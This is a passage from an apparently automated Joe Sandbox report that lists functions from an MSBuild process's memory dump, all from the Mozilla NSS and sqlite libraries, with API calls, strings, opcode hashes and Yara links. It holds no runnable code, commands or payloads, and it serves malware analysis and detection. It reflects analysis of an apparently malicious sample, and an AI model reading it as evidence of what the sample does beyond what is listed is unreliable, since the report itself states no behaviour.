                                                                                          • Part of subcall function 6C6E1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6E1238
                                                                                          • Part of subcall function 6C6E1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E124B
                                                                                          • Part of subcall function 6C6E1200: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E125D
                                                                                          • Part of subcall function 6C6E1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6E126F
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6E1280
                                                                                          • Part of subcall function 6C6E1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6E128E
                                                                                          • Part of subcall function 6C6E1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6E129A
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6E12A1
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C69447A
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C69448A
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C694494
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
                                                                                        • String ID:
                                                                                        • API String ID: 241050562-0
                                                                                        • Opcode ID: e63905bc7034a3111e9803810afb70f122006538b5dff1115ee2e4c8dd2d0910
                                                                                        • Instruction ID: b3294a65d3e6f980c5d237b8f7a5ed219d488e6d9f99d2736ec8ef6934612fee
                                                                                        • Opcode Fuzzy Hash: e63905bc7034a3111e9803810afb70f122006538b5dff1115ee2e4c8dd2d0910
                                                                                        • Instruction Fuzzy Hash: 5311E4B2D007159BD7208F24AC804B7B7F8FF99718B084B3EE89D92A00F371B5988795
                                                                                        Function 6C79CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C79D086
                                                                                        • PR_Malloc.NSS3(00000001), ref: 6C79D0B9
                                                                                        • PR_Free.NSS3(?), ref: 6C79D138
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeMallocstrlen
                                                                                        • String ID: >
                                                                                        • API String ID: 1782319670-325317158
                                                                                        • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                        • Instruction ID: ea488fe5314852cd50783faa8846a2480bf2a98aca011dc4127f50f563f31d15
                                                                                        • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                        • Instruction Fuzzy Hash: EFD16C23B816460FFF14487CAEA13EA77A787623B4F584339D5229BBE5E619C843C305
                                                                                        Function 6C73AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 37122d46c43e8374577f3ad5ee8d1298371e645733a5d44c88589ee82e683e62
                                                                                        • Instruction ID: fa7644b24a9ce11f60a8e07518b9ad72f4cb376ef6c3037a44fe6e325310fa79
                                                                                        • Opcode Fuzzy Hash: 37122d46c43e8374577f3ad5ee8d1298371e645733a5d44c88589ee82e683e62
                                                                                        • Instruction Fuzzy Hash: DCF1D172F0156A8BDB05CF68CA453A9B7F5AB8A308F25823DC909D7751EB74B941CBC0
                                                                                        Function 6C6F0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C6F1052
                                                                                        • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C6F1086
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: h(ol$h(ol
                                                                                        • API String ID: 1297977491-1929750199
                                                                                        • Opcode ID: 4c49be080af268a4e7f0ca4b22760dad9e23ce51a3e899b3f458db9c28804442
                                                                                        • Instruction ID: 2bb9a142e2c2dc5caaf74542701c2b81b7f799c1aaf3e156e06ed37f898e2e5c
                                                                                        • Opcode Fuzzy Hash: 4c49be080af268a4e7f0ca4b22760dad9e23ce51a3e899b3f458db9c28804442
                                                                                        • Instruction Fuzzy Hash: E6A15F71B0124A9FDF08CF99C994AEEBBB6BF4D314B148129E914A7700D735ED12CBA4
                                                                                        Function 6C7125B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,?,6C6F5A85), ref: 6C712675
                                                                                        • PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C712659
                                                                                          • Part of subcall function 6C6C3850: TlsGetValue.KERNEL32 ref: 6C6C389F
                                                                                          • Part of subcall function 6C6C3850: EnterCriticalSection.KERNEL32(?), ref: 6C6C38B3
                                                                                          • Part of subcall function 6C6C3850: PR_Unlock.NSS3(?), ref: 6C6C38F1
                                                                                          • Part of subcall function 6C6C3850: TlsGetValue.KERNEL32 ref: 6C6C390F
                                                                                          • Part of subcall function 6C6C3850: EnterCriticalSection.KERNEL32(?), ref: 6C6C3923
                                                                                          • Part of subcall function 6C6C3850: PR_Unlock.NSS3(?), ref: 6C6C3972
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C712697
                                                                                        • PK11_Encrypt.NSS3(?,?,?,?,00000000,6C6F5A85,?,6C6F5A85), ref: 6C712717
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3114817199-0
                                                                                        • Opcode ID: 26718936eecacbd6f460a63b99ecb0da98cc54c6fc0641d2f62cb5257c88fd70
                                                                                        • Instruction ID: ba3d520086b2df1c8a578243bf4077d286b390381a367129598abbc4f232bb2b
                                                                                        • Opcode Fuzzy Hash: 26718936eecacbd6f460a63b99ecb0da98cc54c6fc0641d2f62cb5257c88fd70
                                                                                        • Instruction Fuzzy Hash: 4E412671A0C380AAFB258E18CD89FDB73A8EFD2714F244528F95407E81EB71958587D3
                                                                                        Function 6C676410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • bind.WSOCK32(?,?,?,?,6C676401,?,?,0000001C), ref: 6C676422
                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,6C676401,?,?,0000001C), ref: 6C676432
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastbind
                                                                                        • String ID:
                                                                                        • API String ID: 2328862993-0
                                                                                        • Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
                                                                                        • Instruction ID: c368a0586855b330d4604f8e343840e73080da34afaf29efb2379f93bd727cbc
                                                                                        • Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
                                                                                        • Instruction Fuzzy Hash: 31E01D35150108AFCB019F75ED0CC5A37A5AF08368B50C910F519C7771E631D4658750
                                                                                        Function 6C750C40 Relevance: .1, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 66593048e9b2443dc1eddb47c64960d4b72d80873ca1b082925da55b36375258
                                                                                        • Instruction ID: 1155e50313a81232bf778eac16d6a35ef06a201ea62f1e66167e4371e39770e4
                                                                                        • Opcode Fuzzy Hash: 66593048e9b2443dc1eddb47c64960d4b72d80873ca1b082925da55b36375258
                                                                                        • Instruction Fuzzy Hash: 5F11CE797043458FDB04DF28C8C46AA77A2FF86368F14807DD8198B701DB31E816CBA0
                                                                                        Function 6C6C44C0 Relevance: .1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3fb9c988b55d71ba6f0cbe59a0089f07b2b53d2d2dbb0b3fadade0c5a200a733
                                                                                        • Instruction ID: 72375ea426853667cd315314d63c07f176fd7bece913ffb5c97e85a15aad83ea
                                                                                        • Opcode Fuzzy Hash: 3fb9c988b55d71ba6f0cbe59a0089f07b2b53d2d2dbb0b3fadade0c5a200a733
                                                                                        • Instruction Fuzzy Hash: 9011F776A002199F8B00CF99D8809EFBBF9EF8C664B554429ED19E7300D230ED10CBE1
                                                                                        Function 6C6C4440 Relevance: .0, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 094b462fde72d222a30301ef44baf6e6c8ea8bd1c2aa25aadee1b2952e670b7e
                                                                                        • Instruction ID: ecba50193966b2d12fc1bd184a213b60ddacbf196749934d99e52191d51b1da5
                                                                                        • Opcode Fuzzy Hash: 094b462fde72d222a30301ef44baf6e6c8ea8bd1c2aa25aadee1b2952e670b7e
                                                                                        • Instruction Fuzzy Hash: 1F11B376A002199F9B00DF69C8849EFBBF9EF48214B16416AED18E7301E630ED118BE1
                                                                                        Function 6C750D60 Relevance: .0, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                        • Instruction ID: ac72a4748540029156803c5f429a67eeca0b32ddbc7fac5553b4efec322962b9
                                                                                        • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                        • Instruction Fuzzy Hash: 1AE0923A202254A7DB148E09C555AA97359DF8161DFF4887DCC5D9FA01DB33F8138781
                                                                                        Function 6C6A8670 Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$K11_$Alloc_ArenaArena_DoesFindMechanismTag_
                                                                                        • String ID:
                                                                                        • API String ID: 2003479236-0
                                                                                        • Opcode ID: 23e773cf1430b448038cb5704f69fb380029e02cc391f3ea17a25ad626348aa6
                                                                                        • Instruction ID: 5d4b9db718dc558f5da4da85494602c9a33d6d9e04dea661a4cec479ed033804
                                                                                        • Opcode Fuzzy Hash: 23e773cf1430b448038cb5704f69fb380029e02cc391f3ea17a25ad626348aa6
                                                                                        • Instruction Fuzzy Hash: FEE0B6B0C08B489BD708DF6AD5410AAFBE4AFD8214F00D91DFC9C47212E730A5D48B86
                                                                                        Function 6C756E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C60CA30: EnterCriticalSection.KERNEL32(?,?,?,6C66F9C9,?,6C66F4DA,6C66F9C9,?,?,6C63369A), ref: 6C60CA7A
                                                                                          • Part of subcall function 6C60CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C60CB26
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,6C61BE66), ref: 6C756E81
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C61BE66), ref: 6C756E98
                                                                                        • sqlite3_snprintf.NSS3(?,00000000,6C7BAAF9,?,?,?,?,?,?,6C61BE66), ref: 6C756EC9
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C61BE66), ref: 6C756ED2
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C61BE66), ref: 6C756EF8
                                                                                        • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C61BE66), ref: 6C756F1F
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C756F28
                                                                                        • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C756F3D
                                                                                        • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C61BE66), ref: 6C756FA6
                                                                                        • sqlite3_snprintf.NSS3(?,00000000,6C7BAAF9,00000000,?,?,?,?,?,?,?,6C61BE66), ref: 6C756FDB
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C756FE4
                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C756FEF
                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C61BE66), ref: 6C757014
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,6C61BE66), ref: 6C75701D
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C61BE66), ref: 6C757030
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C61BE66), ref: 6C75705B
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C61BE66), ref: 6C757079
                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C61BE66), ref: 6C757097
                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C61BE66), ref: 6C7570A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                        • String ID: Pyl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                        • API String ID: 593473924-652789291
                                                                                        • Opcode ID: 6da344df78eb97017525a88d691e2fc5d521bc65a8efdbf850f445da230d8d3e
                                                                                        • Instruction ID: 9c7a6eadfb0f9d58bdcf213a5c601bdae81840e544c061d5bea8e759e3383c00
                                                                                        • Opcode Fuzzy Hash: 6da344df78eb97017525a88d691e2fc5d521bc65a8efdbf850f445da230d8d3e
                                                                                        • Instruction Fuzzy Hash: E4516C71F101116BE30456309E59FBB366B9F8331CF544538E805A6BC1FF26AA2E82D7
                                                                                        Function 6C6B8E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_WrapKey), ref: 6C6B8E76
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B8EA4
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B8EB3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B8EC9
                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C6B8EE5
                                                                                        • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C6B8F17
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B8F29
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B8F3F
                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6B8F71
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B8F80
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B8F96
                                                                                        • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C6B8FB2
                                                                                        • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C6B8FCD
                                                                                        • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C6B9047
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$nyl
                                                                                        • API String ID: 1003633598-754918038
                                                                                        • Opcode ID: 0677f02b4d46544a7e9c66a53fc205cb1f7909015445529619c8e005f5e42c2f
                                                                                        • Instruction ID: 26c2de0b250b560b1fe452f809640309f8d2e926aefcee082ee0d03e4f1e22de
